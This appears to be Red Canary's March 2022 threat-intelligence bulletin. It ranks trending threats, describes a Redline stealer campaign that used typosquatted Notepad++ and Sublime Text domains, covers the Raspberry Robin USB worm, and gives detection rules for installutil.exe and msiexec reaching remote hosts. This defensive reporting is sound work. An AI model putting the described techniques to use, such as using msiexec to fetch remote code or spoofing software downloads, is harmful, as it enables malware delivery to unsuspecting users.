Intelligence Insights: March 2022

⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month

*Denotes a tie

Observations on trending threats

SocGholish reclaimed the top spot in February after a brief respite in January, when it dropped to the middle of the pack. Despite this, Red Canary did not observe any secondary payloads delivered by SocGholish last month. Several of the detections contained multiple scriptloads typical of discovery activity.
Rounding out the top 10 are several usual suspects—Mimikatz and Impacket remain in the top three, and Emotet and Qbot phishing campaigns continued to haunt inboxes. The activity cluster we recently dubbed “Coral Crane” cracked the top 10, and Raspberry Robin, another new activity cluster, just missed the rankings. You can read more about Raspberry Robin below and about Coral Crane in the February Intelligence Insights.

What are all those squiggly Redlines?

Rounding out the bottom of our top 10 list is Redline, a malware-as-a-service information stealer. Red Canary began observing an uptick in Redline activity in February due to a new campaign that abused Google Ads to deliver binaries masquerading as various Notepad replacements, such as Notepad++ and Sublime Text. In this latest campaign, Redline payloads were delivered via domains containing misspellings, such as notpaad[.]com and sublimettxt[.]com. The payloads used a known bug in Authenticode to appear as if they are legitimate signed binaries.

To thwart this bug, Microsoft provides guidance to enable strict Authenticode verification that would inhibit payloads of this type from executing with invalid signatures. However, enabling this functionality may break older applications. Maintaining a strong software management process with centralized distribution of approved applications can prevent well intentioned users from falling victim to lookalike decoys.

Detection opportunity: Installutil.exe making external network connections

This detection opportunity identifies activity associated with adversary tools that deliver Redline.

process == installutil.exe
&&
has_external_netconn == true

New Raspberry Robin activity cluster

As far back as January 2022, we’ve observed an uptick in detections associated with Raspberry Robin, a Red Canary activity cluster involving a worm that spreads via USB drives. This worm may appear as a shortcut (LNK file) masquerading as a legitimate folder on a USB device. Once executed, it can beacon back to a compromised QNAP storage device for command and control.
Since we began tracking this threat only recently, our analysis is ongoing and we don’t yet know the extent of its capabilities. Based on activity we’ve seen so far, organizations that rely on USB devices should be aware of this threat.

Detection opportunity: msiexec contacting a remote host over HTTP 

This detection opportunity identifies the Windows Installer Tool, msiexec.exe, contacting a remote host over HTTP. Raspberry Robin uses this technique during its infection process, and this opportunity will also catch other threats that perform similar actions.

process == (msiexec.exe)
&&
process_command_line_includes == (http://, https://)